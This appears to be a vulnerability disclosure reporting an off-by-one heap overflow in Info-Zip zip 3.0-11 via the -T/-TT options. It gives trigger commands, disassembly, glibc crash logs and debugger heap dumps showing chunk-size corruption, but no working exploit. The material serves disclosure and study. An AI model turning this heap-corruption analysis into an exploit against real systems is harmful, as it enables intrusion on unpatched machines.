Info-Zip Zip 3.0-11 Crash

Info-Zip's zip binary version 3.0-11 may suffer from an off by one vulnerability.


MD5 | 6139519aad8232ae7c1faab25f613857

Hello,

I found info-zip's zip command's crash.
This vulnerability is occured by off by one.
I don't use the malformed file for crash. just command.

And if 'zip' binary is added to function, it can be exploitable vulnerability I think.

[ Environment ]

OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11

[ Condition ]

* using option -T, -TT
* Vulnerability is occured by off by one.
: linux command execution using option -T, -TT
: To execute the command used in the -T and -TT options, it is stored in the heap before the system, and the data to be stored is parsed as follows.
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: When an instruction is stored in the heap, it is occured by off by one.
: It happens in the code below.
Disassembly -
.text:000000000040A052 mov rax, [rsp+48h+var_40]
.text:000000000040A057 mov word ptr [r15+rax+2], 27h
Hexray -
*(_WORD *)&v7[v16 + 2] = 0x27;


[ Error Msg ]

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA' <- die process
sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0 [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307aa000-7f47307ab000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]


zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0 [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307a9000-7f47307aa000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]


CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' <- not die process

sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
01701000-01722000 rw-p 00000000 00:00 0 [heap]
7fa2c0000000-7fa2c0021000 rw-p 00000000 00:00 0
7fa2c0021000-7fa2c4000000 ---p 00000000 00:00 0
7fa2c79e4000-7fa2c79fa000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c79fa000-7fa2c7bf9000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bf9000-7fa2c7bfa000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bfa000-7fa2c7ed2000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive
7fa2c7ed2000-7fa2c8092000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8092000-7fa2c8292000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8292000-7fa2c8296000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8296000-7fa2c8298000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8298000-7fa2c829c000 rw-p 00000000 00:00 0
7fa2c829c000-7fa2c82ab000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c82ab000-7fa2c84aa000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84aa000-7fa2c84ab000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ab000-7fa2c84ac000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ac000-7fa2c84d2000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86ac000-7fa2c86b0000 rw-p 00000000 00:00 0
7fa2c86d0000-7fa2c86d1000 rw-p 00000000 00:00 0
7fa2c86d1000-7fa2c86d2000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d2000-7fa2c86d3000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d3000-7fa2c86d4000 rw-p 00000000 00:00 0
7ffc0dc06000-7ffc0dc27000 rw-p 00000000 00:00 0 [stack]
7ffc0dd37000-7ffc0dd3a000 r-np 00000000 00:00 0 [vvar]
7ffc0dd3a000-7ffc0dd3c000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]


zip error: Interrupted (aborting)


[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'

* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: this case malloc 0x18 size.
: so, overwrite next chunk size to null. (off by one)
# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x616c662720414141
0x67f360: 0x002770697a2e5467 0x00000000000000c1 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

# Crash
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x6c66272041414141
0x67f360: 0x2770697a2e546761 0x0000000000000000 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

* Case 2 : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
# crash
: before [email protected] <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x6c66272041414141
0x67f190: 0x2770697a2e546761 0x0000000000000100 <- off by one
^
prev_size

# not crash
: before [email protected] <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x00000000000001f1

: after [email protected] <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000251
0x67f160: 0x00007ffff7bc1db8 0x00007ffff7bc1db8
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x0000000000000211



Related Posts